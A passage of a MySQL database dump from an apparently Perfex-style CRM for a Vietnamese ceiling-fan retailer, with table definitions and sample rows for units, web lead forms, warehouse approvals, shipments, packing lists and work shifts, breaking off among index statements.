) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblware_style_type`
--

INSERT INTO `tblware_style_type` (`style_type_id`, `style_code`, `style_barcode`, `style_name`, `order`, `display`, `note`) VALUES
(1, 'K01', '0', 'Công Nghiệp', 0, 1, '0'),
(2, 'K02', '0', 'Trang Trí', 0, 1, '0');

-- --------------------------------------------------------

--
-- Table structure for table `tblware_unit_type`
--

CREATE TABLE `tblware_unit_type` (
  `unit_type_id` int(10) UNSIGNED NOT NULL,
  `unit_code` varchar(100) DEFAULT NULL,
  `unit_name` text DEFAULT NULL,
  `unit_symbol` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblware_unit_type`
--

INSERT INTO `tblware_unit_type` (`unit_type_id`, `unit_code`, `unit_name`, `unit_symbol`, `order`, `display`, `note`) VALUES
(1, '01', 'Cái', 'c', 1, 1, '0'),
(2, '02', 'Bộ', 'b', 0, 1, '0'),
(3, '03', 'Lô', 'Lots', 0, 1, '0'),
(4, '04', 'Trọn Gói', 'Lots', 0, 1, '0');

-- --------------------------------------------------------

--
-- Table structure for table `tblweb_to_lead`
--

CREATE TABLE `tblweb_to_lead` (
  `id` int(11) NOT NULL,
  `form_key` varchar(32) NOT NULL,
  `lead_source` int(11) NOT NULL,
  `lead_status` int(11) NOT NULL,
  `notify_lead_imported` int(11) NOT NULL DEFAULT 1,
  `notify_type` varchar(20) DEFAULT NULL,
  `notify_ids` mediumtext DEFAULT NULL,
  `responsible` int(11) NOT NULL DEFAULT 0,
  `name` varchar(191) NOT NULL,
  `form_data` mediumtext DEFAULT NULL,
  `recaptcha` int(11) NOT NULL DEFAULT 0,
  `submit_btn_name` varchar(40) DEFAULT NULL,
  `submit_btn_text_color` varchar(10) DEFAULT '#ffffff',
  `submit_btn_bg_color` varchar(10) DEFAULT '#84c529',
  `success_submit_msg` text DEFAULT NULL,
  `submit_action` int(11) DEFAULT 0,
  `lead_name_prefix` varchar(255) DEFAULT NULL,
  `submit_redirect_url` mediumtext DEFAULT NULL,
  `language` varchar(40) DEFAULT NULL,
  `allow_duplicate` int(11) NOT NULL DEFAULT 1,
  `mark_public` int(11) NOT NULL DEFAULT 0,
  `track_duplicate_field` varchar(20) DEFAULT NULL,
  `track_duplicate_field_and` varchar(20) DEFAULT NULL,
  `create_task_on_duplicate` int(11) NOT NULL DEFAULT 0,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblweb_to_lead`
--

INSERT INTO `tblweb_to_lead` (`id`, `form_key`, `lead_source`, `lead_status`, `notify_lead_imported`, `notify_type`, `notify_ids`, `responsible`, `name`, `form_data`, `recaptcha`, `submit_btn_name`, `submit_btn_text_color`, `submit_btn_bg_color`, `success_submit_msg`, `submit_action`, `lead_name_prefix`, `submit_redirect_url`, `language`, `allow_duplicate`, `mark_public`, `track_duplicate_field`, `track_duplicate_field_and`, `create_task_on_duplicate`, `dateadded`) VALUES
(1, '7f70507e8b6f896a19d915ae8f24c474', 3, 2, 1, 'roles', 'a:2:{i:0;s:1:\"2\";i:1;s:1:\"4\";}', 1, 'Form_QuatCaoCap', '[{\"type\":\"paragraph\",\"subtype\":\"p\",\"label\":\"<span xss=\'\'>Bạn hãy để lại thông tin quan tâm sản phẩm, model. Chúng tôi sẽ liên hệ lại ngay.</span>\",\"className\":\"20\"},{\"type\":\"text\",\"required\":true,\"label\":\"Điện thoại\",\"className\":\"form-control form-col-6\",\"name\":\"phonenumber\",\"subtype\":\"text\"},{\"type\":\"text\",\"subtype\":\"email\",\"required\":true,\"label\":\"E-mail\",\"className\":\"form-control form-col-6\",\"name\":\"email\"},{\"type\":\"file\",\"label\":\"Tải ảnh mẫu\",\"className\":\"form-control form-col-6\",\"name\":\"file-input\",\"subtype\":\"file\",\"multiple\":true},{\"type\":\"text\",\"label\":\"Model sản phẩm\",\"description\":\"Hãy cho chúng tôi biết bạn quan tâm model  tên sản phẩm ?\",\"className\":\"form-control form-col-6\",\"name\":\"company\",\"subtype\":\"text\"},{\"type\":\"textarea\",\"label\":\"Mô tả\",\"description\":\"Thông tin: diện tích phòng  độ cao trần (dài x rộng x cao)\",\"className\":\"form-control\",\"name\":\"description\",\"subtype\":\"textarea\"}]', 0, 'Gởi yêu cầu', '#ffffff', '#537f53', 'Cám ơn quý khách đã đặt hàng. Nhân viên bán hàng của chúng tôi sẽ liên hệ lại với quý khách trong vòng 1h. Nếu đơn hàng quý khách đặt sau 18h, nhân viên chúng tôi sẽ liên hệ với quý khách vào ngày hôm sau.', 0, '', '', 'vietnamese', 1, 1, '', '', 0, '2022-01-07 14:36:18'),
(2, '56b1ebb8f5c3efb7075da8e8c970f259', 3, 2, 1, 'roles', 'a:1:{i:0;s:1:\"2\";}', 1, 'www.quattranvn.com', '[{\"type\":\"paragraph\",\"subtype\":\"p\",\"label\":\"Bạn hãy để lại thông tin quan tâm sản phẩm, model. Chúng tôi sẽ liên hệ lại ngay.\",\"className\":\"10\"},{\"type\":\"text\",\"label\":\"Tên bạn\",\"className\":\"form-control\",\"name\":\"name\",\"subtype\":\"text\"},{\"type\":\"text\",\"required\":true,\"label\":\"Điện thoại\",\"className\":\"form-control\",\"name\":\"phonenumber\",\"subtype\":\"text\"},{\"type\":\"file\",\"label\":\"Tải ảnh mẫu\",\"className\":\"form-control\",\"name\":\"file-input\",\"subtype\":\"file\",\"multiple\":true},{\"type\":\"textarea\",\"label\":\"Mô tả thông tin\",\"description\":\"Mô tả độ cao trần nhà  diện tích phòng cần lắp quạt ?\",\"className\":\"form-control\",\"name\":\"description\",\"subtype\":\"textarea\"}]', 0, 'Gởi yêu cầu', '#ffffff', '#537f53', 'Cám ơn quý khách đã để lại thông tin đặt hàng. Nhân viên của chúng tôi sẽ liên hệ lại với quý khách trong vòng 1h. Nếu đơn hàng quý khách đặt sau 18h, nhân viên chúng tôi sẽ liên hệ với quý khách vào ngày hôm sau.', 0, '', '', 'vietnamese', 1, 1, '', '', 0, '2022-01-08 10:57:17'),
(3, 'a818ca9da6fe4166c8e6c01f8e64aca5', 3, 2, 1, 'roles', 'a:2:{i:0;s:1:\"2\";i:1;s:1:\"4\";}', 1, 'www.quatcaocap.com', '[{\"type\":\"text\",\"label\":\"Tên\",\"className\":\"form-control\",\"name\":\"name\",\"subtype\":\"text\"},{\"type\":\"text\",\"subtype\":\"email\",\"label\":\"Địa chỉ email\",\"className\":\"form-control\",\"name\":\"email\"},{\"type\":\"text\",\"required\":true,\"label\":\"Điện thoại\",\"className\":\"form-control\",\"name\":\"phonenumber\",\"subtype\":\"text\"},{\"type\":\"text\",\"label\":\"Model sản phẩm\",\"className\":\"form-control\",\"name\":\"company\",\"subtype\":\"text\"},{\"type\":\"textarea\",\"label\":\"Mô tả\",\"className\":\"form-control\",\"name\":\"description\",\"subtype\":\"textarea\"}]', 0, 'Gởi thông tin', '#ffffff', '#537f53', 'Thanks you', 0, NULL, '', 'vietnamese', 1, 1, '', '', 0, '2022-11-04 13:16:16'),
(4, 'd360b37fea421cc1622be08950ab3cdb', 2, 2, 1, 'roles', 'a:2:{i:0;s:1:\"2\";i:1;s:1:\"4\";}', 1, 'Facebook Ads', '[{\"type\":\"text\",\"label\":\"Tên\",\"className\":\"form-control\",\"name\":\"name\",\"subtype\":\"text\"},{\"type\":\"text\",\"required\":true,\"label\":\"Điện thoại\",\"className\":\"form-control\",\"name\":\"phonenumber\",\"subtype\":\"text\"},{\"type\":\"text\",\"subtype\":\"email\",\"label\":\"Địa chỉ email\",\"className\":\"form-control\",\"name\":\"email\"},{\"type\":\"textarea\",\"label\":\"Mô tả\",\"className\":\"form-control\",\"name\":\"description\",\"subtype\":\"textarea\"}]', 0, 'Gởi thông tin', '#ffffff', '#537f53', 'Thanks', 0, NULL, '', 'vietnamese', 1, 1, '', '', 0, '2022-11-04 13:18:52');

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_activity_log`
--

CREATE TABLE `tblwh_activity_log` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(45) NOT NULL,
  `staffid` int(11) DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblwh_activity_log`
--

INSERT INTO `tblwh_activity_log` (`id`, `rel_id`, `rel_type`, `staffid`, `date`, `note`) VALUES
(1, 1, 'stock_import', 1, '2024-01-24 09:10:56', 'stock_import'),
(2, 1, '1', 1, '2024-01-24 09:11:14', 'approve_request'),
(3, 1, '1', 1, '2024-01-24 09:11:23', 'approve_request'),
(4, 1, 'stock_export', 17, '2024-01-26 08:23:05', 'stock_export'),
(5, 1, 'packing_lists', 1, '2024-01-26 14:07:24', 'packing_lists'),
(6, 2, 'stock_export', 1, '2024-01-26 14:14:45', 'stock_export'),
(7, 2, 'stock_export', 1, '2024-01-26 14:15:38', 'stock_export'),
(8, 2, 'stock_export', 1, '2024-01-26 14:17:02', 'stock_export'),
(9, 2, 'stock_export', 1, '2024-01-26 14:17:30', 'stock_export'),
(10, 2, 'stock_export', 1, '2024-01-26 14:17:58', 'stock_export'),
(11, 2, 'stock_export', 1, '2024-01-26 14:19:27', 'stock_export'),
(12, 3, 'stock_export', 1, '2024-01-26 14:42:22', 'stock_export'),
(13, 3, '2', 1, '2024-01-26 14:42:30', 'approve_request');

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_approval_details`
--

CREATE TABLE `tblwh_approval_details` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(45) NOT NULL,
  `staffid` varchar(45) DEFAULT NULL,
  `approve` varchar(45) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `approve_action` varchar(255) DEFAULT NULL,
  `reject_action` varchar(255) DEFAULT NULL,
  `approve_value` varchar(255) DEFAULT NULL,
  `reject_value` varchar(255) DEFAULT NULL,
  `staff_approve` int(11) DEFAULT NULL,
  `action` varchar(45) DEFAULT NULL,
  `sender` int(11) DEFAULT NULL,
  `date_send` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblwh_approval_details`
--

INSERT INTO `tblwh_approval_details` (`id`, `rel_id`, `rel_type`, `staffid`, `approve`, `note`, `date`, `approve_action`, `reject_action`, `approve_value`, `reject_value`, `staff_approve`, `action`, `sender`, `date_send`) VALUES
(1, 1, '1', '1', '1', 'đã mua hàng nhập khẩu có tờ khai', '2024-01-24 09:11:14', NULL, NULL, NULL, NULL, 1, 'approve', 1, '2024-01-24 09:10:56'),
(2, 1, '1', '1', '1', 'OK', '2024-01-24 09:11:23', NULL, NULL, NULL, NULL, 1, 'approve', 1, '2024-01-24 09:10:56'),
(3, 3, '2', '1', '1', 'Đã bán', '2024-01-26 14:42:30', NULL, NULL, NULL, NULL, 1, 'approve', 1, '2024-01-26 14:42:22');

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_approval_setting`
--

CREATE TABLE `tblwh_approval_setting` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `related` varchar(255) NOT NULL,
  `setting` longtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblwh_approval_setting`
--

INSERT INTO `tblwh_approval_setting` (`id`, `name`, `related`, `setting`) VALUES
(1, 'Duyệt nhập kho', '1', '[{\"approver\":\"staff\",\"staff\":\"1\",\"action\":\"approve\"},{\"approver\":\"staff\",\"staff\":\"1\",\"action\":\"approve\"}]'),
(2, 'Duyệt xuất kho', '2', '[{\"approver\":\"staff\",\"staff\":\"1\",\"action\":\"approve\"}]'),
(3, 'Duyệt chuyển kho', '4', '[{\"approver\":\"staff\",\"staff\":\"1\",\"action\":\"approve\"},{\"approver\":\"staff\",\"staff\":\"\",\"action\":\"\"}]'),
(4, 'Phe duyet mat dieu chinh', '3', '[{\"approver\":\"staff\",\"staff\":\"1\",\"action\":\"approve\"},{\"approver\":\"staff\",\"staff\":\"\",\"action\":\"\"}]');

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_brand`
--

CREATE TABLE `tblwh_brand` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_custom_fields`
--

CREATE TABLE `tblwh_custom_fields` (
  `id` int(10) UNSIGNED NOT NULL,
  `custom_fields_id` int(11) DEFAULT NULL,
  `warehouse_id` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblwh_custom_fields`
--

INSERT INTO `tblwh_custom_fields` (`id`, `custom_fields_id`, `warehouse_id`) VALUES
(2, 4, '1,2');

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_goods_delivery_activity_log`
--

CREATE TABLE `tblwh_goods_delivery_activity_log` (
  `id` int(10) UNSIGNED NOT NULL,
  `rel_id` int(11) DEFAULT NULL,
  `rel_type` varchar(100) DEFAULT NULL,
  `description` mediumtext DEFAULT NULL,
  `additional_data` text DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `staffid` int(11) DEFAULT NULL,
  `full_name` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblwh_goods_delivery_activity_log`
--

INSERT INTO `tblwh_goods_delivery_activity_log` (`id`, `rel_id`, `rel_type`, `description`, `additional_data`, `date`, `staffid`, `full_name`) VALUES
(1, 1, 'shipment', 'Đơn hàng đã được xác nhận', NULL, '2024-01-26 08:23:05', 17, 'Loan Nguyễn'),
(2, 1, 'shipment', 'Lô hàng đã được tạo', NULL, '2024-01-26 08:23:05', 17, 'Loan Nguyễn'),
(3, 1, 'delivery', ' <a href=\"https://hgphome.com/admin/warehouse/manage_packing_list/1\">Gói đã được đóng gói thành công</a> ', NULL, '2024-01-26 14:07:24', 1, 'Ho Gia Phat'),
(4, 2, 'shipment', 'Đơn hàng đã được xác nhận', NULL, '2024-01-26 14:42:30', 1, 'Ho Gia Phat'),
(5, 2, 'shipment', 'Lô hàng đã được tạo', NULL, '2024-01-26 14:42:30', 1, 'Ho Gia Phat');

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_inventory_serial_numbers`
--

CREATE TABLE `tblwh_inventory_serial_numbers` (
  `id` int(11) NOT NULL,
  `commodity_id` int(11) NOT NULL,
  `warehouse_id` int(11) DEFAULT NULL,
  `inventory_manage_id` int(11) DEFAULT NULL,
  `serial_number` varchar(255) DEFAULT NULL,
  `is_used` varchar(20) DEFAULT 'no'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_loss_adjustment`
--

CREATE TABLE `tblwh_loss_adjustment` (
  `id` int(10) UNSIGNED NOT NULL,
  `type` varchar(15) DEFAULT NULL,
  `addfrom` int(11) DEFAULT NULL,
  `reason` longtext DEFAULT NULL,
  `time` datetime DEFAULT NULL,
  `date_create` date NOT NULL,
  `status` int(11) NOT NULL,
  `warehouses` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_loss_adjustment_detail`
--

CREATE TABLE `tblwh_loss_adjustment_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `items` int(11) DEFAULT NULL,
  `unit` int(11) DEFAULT NULL,
  `current_number` int(11) DEFAULT NULL,
  `updates_number` int(11) DEFAULT NULL,
  `loss_adjustment` int(11) DEFAULT NULL,
  `expiry_date` text DEFAULT NULL,
  `lot_number` text DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_model`
--

CREATE TABLE `tblwh_model` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` text DEFAULT NULL,
  `brand_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_omni_shipments`
--

CREATE TABLE `tblwh_omni_shipments` (
  `id` int(11) NOT NULL,
  `cart_id` int(11) DEFAULT NULL,
  `shipment_number` varchar(100) DEFAULT NULL,
  `planned_shipping_date` datetime DEFAULT NULL,
  `shipment_status` varchar(50) DEFAULT NULL,
  `datecreated` datetime DEFAULT NULL,
  `goods_delivery_id` int(11) DEFAULT NULL,
  `shipment_hash` varchar(32) DEFAULT NULL,
  `order_id` int(11) DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblwh_omni_shipments`
--

INSERT INTO `tblwh_omni_shipments` (`id`, `cart_id`, `shipment_number`, `planned_shipping_date`, `shipment_status`, `datecreated`, `goods_delivery_id`, `shipment_hash`, `order_id`) VALUES
(1, NULL, 'SHIPMENT202401260823', NULL, 'quality_check', '2024-01-26 08:23:05', 1, '4b6841fa27599f7b03313e2b56d129e3', 0),
(2, NULL, 'SHIPMENT202401261442', NULL, 'quality_check', '2024-01-26 14:42:30', 3, '04f0010ab06b49723633fff230de96aa', 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_order_returns`
--

CREATE TABLE `tblwh_order_returns` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) DEFAULT NULL,
  `rel_type` varchar(50) NOT NULL COMMENT 'manual, sales_return_order, purchasing_return_order',
  `return_type` varchar(50) DEFAULT NULL COMMENT 'manual, partially, fully',
  `company_id` int(11) DEFAULT NULL,
  `company_name` varchar(500) DEFAULT NULL,
  `email` varchar(100) DEFAULT NULL,
  `phonenumber` varchar(20) DEFAULT NULL,
  `order_number` varchar(500) DEFAULT NULL,
  `order_date` datetime DEFAULT NULL,
  `number_of_item` decimal(15,2) DEFAULT 0.00,
  `order_total` decimal(15,2) DEFAULT 0.00,
  `order_return_number` varchar(200) DEFAULT NULL,
  `order_return_name` varchar(500) DEFAULT NULL,
  `fee_return_order` decimal(15,2) DEFAULT 0.00,
  `refund_loyaty_point` int(11) DEFAULT 0,
  `subtotal` decimal(15,2) DEFAULT 0.00,
  `total_amount` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `additional_discount` decimal(15,2) DEFAULT 0.00,
  `adjustment_amount` decimal(15,2) DEFAULT 0.00,
  `total_after_discount` decimal(15,2) DEFAULT 0.00,
  `return_policies_information` text DEFAULT NULL,
  `admin_note` text DEFAULT NULL,
  `approval` int(11) DEFAULT 0,
  `datecreated` datetime DEFAULT NULL,
  `staff_id` int(11) DEFAULT NULL,
  `currency` int(11) DEFAULT NULL,
  `receipt_delivery_id` int(11) DEFAULT 0,
  `return_reason` longtext DEFAULT NULL,
  `status` varchar(30) DEFAULT 'draft',
  `receipt_delivery_type` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_order_returns_refunds`
--

CREATE TABLE `tblwh_order_returns_refunds` (
  `id` int(10) UNSIGNED NOT NULL,
  `order_return_id` int(11) DEFAULT NULL,
  `staff_id` int(11) DEFAULT NULL,
  `refunded_on` date DEFAULT NULL,
  `payment_mode` varchar(40) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `amount` decimal(15,2) DEFAULT NULL,
  `created_at` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_order_return_details`
--

CREATE TABLE `tblwh_order_return_details` (
  `id` int(11) NOT NULL,
  `order_return_id` int(11) NOT NULL,
  `rel_type_detail_id` int(11) DEFAULT NULL,
  `commodity_code` int(11) DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `quantity` decimal(15,2) DEFAULT 0.00,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT 0.00,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `tax_id` text DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `total_amount` decimal(15,2) DEFAULT 0.00,
  `discount` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `total_after_discount` decimal(15,2) DEFAULT 0.00,
  `reason_return` varchar(200) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_packing_lists`
--

CREATE TABLE `tblwh_packing_lists` (
  `id` int(11) NOT NULL,
  `delivery_note_id` int(11) DEFAULT NULL,
  `packing_list_number` varchar(100) DEFAULT NULL,
  `packing_list_name` varchar(200) DEFAULT NULL,
  `width` decimal(15,2) DEFAULT 0.00,
  `height` decimal(15,2) DEFAULT 0.00,
  `lenght` decimal(15,2) DEFAULT 0.00,
  `weight` decimal(15,2) DEFAULT 0.00,
  `volume` decimal(15,2) DEFAULT 0.00,
  `clientid` int(11) DEFAULT NULL,
  `subtotal` decimal(15,2) DEFAULT 0.00,
  `total_amount` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `additional_discount` decimal(15,2) DEFAULT 0.00,
  `total_after_discount` decimal(15,2) DEFAULT 0.00,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT NULL,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT NULL,
  `client_note` text DEFAULT NULL,
  `admin_note` text DEFAULT NULL,
  `approval` int(11) DEFAULT 0,
  `datecreated` datetime DEFAULT NULL,
  `staff_id` int(11) DEFAULT NULL,
  `type_of_packing_list` varchar(100) DEFAULT 'total',
  `delivery_status` varchar(100) DEFAULT 'wh_ready_to_deliver',
  `shipping_fee` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblwh_packing_lists`
--

INSERT INTO `tblwh_packing_lists` (`id`, `delivery_note_id`, `packing_list_number`, `packing_list_name`, `width`, `height`, `lenght`, `weight`, `volume`, `clientid`, `subtotal`, `total_amount`, `discount_total`, `additional_discount`, `total_after_discount`, `billing_street`, `billing_city`, `billing_state`, `billing_zip`, `billing_country`, `shipping_street`, `shipping_city`, `shipping_state`, `shipping_zip`, `shipping_country`, `client_note`, `admin_note`, `approval`, `datecreated`, `staff_id`, `type_of_packing_list`, `delivery_status`, `shipping_fee`) VALUES
(1, 1, 'PL1', 'PACKING_LIST202401261407', 0.00, 0.00, 0.00, 0.00, 0.00, 1436, 11000000.00, 11000000.00, 0.00, 0.00, 11000000.00, '', '', '', '', NULL, '', '', '', '', NULL, '', '', 1, '2024-01-26 14:07:24', 1, 'total', 'wh_ready_to_deliver', 0.00);

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_packing_list_details`
--

CREATE TABLE `tblwh_packing_list_details` (
  `id` int(11) NOT NULL,
  `packing_list_id` int(11) NOT NULL,
  `delivery_detail_id` int(11) DEFAULT NULL,
  `commodity_code` int(11) DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `quantity` decimal(15,2) DEFAULT 0.00,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT 0.00,
  `sub_total` decimal(15,2) DEFAULT 0.00,
  `tax_id` text DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `total_amount` decimal(15,2) DEFAULT 0.00,
  `discount` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `total_after_discount` decimal(15,2) DEFAULT 0.00,
  `serial_number` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblwh_packing_list_details`
--

INSERT INTO `tblwh_packing_list_details` (`id`, `packing_list_id`, `delivery_detail_id`, `commodity_code`, `commodity_name`, `quantity`, `unit_id`, `unit_price`, `sub_total`, `tax_id`, `tax_rate`, `tax_name`, `total_amount`, `discount`, `discount_total`, `total_after_discount`, `serial_number`) VALUES
(1, 1, 1, 1882, 'HA142_Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 2.00, 1, 5500000.00, 11000000.00, NULL, NULL, NULL, 11000000.00, 0.00, 0.00, 11000000.00, '');

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_series`
--

CREATE TABLE `tblwh_series` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` text DEFAULT NULL,
  `model_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwh_sub_group`
--

CREATE TABLE `tblwh_sub_group` (
  `id` int(10) UNSIGNED NOT NULL,
  `sub_group_code` varchar(100) DEFAULT NULL,
  `sub_group_name` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL,
  `group_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwoocommere_store`
--

CREATE TABLE `tblwoocommere_store` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(150) DEFAULT NULL,
  `ip` varchar(30) DEFAULT NULL,
  `url` varchar(350) DEFAULT NULL,
  `port` varchar(10) DEFAULT NULL,
  `token` varchar(250) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblwoocommere_store_detailt`
--

CREATE TABLE `tblwoocommere_store_detailt` (
  `id` int(10) UNSIGNED NOT NULL,
  `group_product_id` int(11) NOT NULL,
  `product_id` int(11) NOT NULL,
  `woocommere_store_id` int(11) NOT NULL,
  `prices` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblworkplace`
--

CREATE TABLE `tblworkplace` (
  `workplace_id` int(10) UNSIGNED NOT NULL,
  `workplace_name` varchar(200) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblworkplace`
--

INSERT INTO `tblworkplace` (`workplace_id`, `workplace_name`) VALUES
(1, 'Working');

-- --------------------------------------------------------

--
-- Table structure for table `tblwork_shift`
--

CREATE TABLE `tblwork_shift` (
  `id` int(11) NOT NULL,
  `shift_code` varchar(45) NOT NULL,
  `shift_name` varchar(200) NOT NULL,
  `shift_type` varchar(200) NOT NULL,
  `department` int(11) DEFAULT 0,
  `position` int(11) DEFAULT 0,
  `add_from` int(11) NOT NULL,
  `date_create` date DEFAULT NULL,
  `from_date` date DEFAULT NULL,
  `to_date` date DEFAULT NULL,
  `shifts_detail` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblwork_shift`
--

INSERT INTO `tblwork_shift` (`id`, `shift_code`, `shift_name`, `shift_type`, `department`, `position`, `add_from`, `date_create`, `from_date`, `to_date`, `shifts_detail`) VALUES
(1, 'Luong_CA', 'Bảng Lương chấm công - Ms.Quỳnh', 'part_office_time', 2, 2, 1, '2022-06-21', '2022-06-21', '2022-08-21', 'Time to start working,,,,,,,,,End time for work,,,,,,,,,Start lunch break time,,,,,,,,,End lunch break time,,,,,,,,');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `tblacc_accounts`
--
ALTER TABLE `tblacc_accounts`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_account_history`
--
ALTER TABLE `tblacc_account_history`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_account_type_details`
--
ALTER TABLE `tblacc_account_type_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_banking_rules`
--
ALTER TABLE `tblacc_banking_rules`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_banking_rule_details`
--
ALTER TABLE `tblacc_banking_rule_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_budgets`
--
ALTER TABLE `tblacc_budgets`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_budget_details`
--
ALTER TABLE `tblacc_budget_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_expense_category_mappings`
--
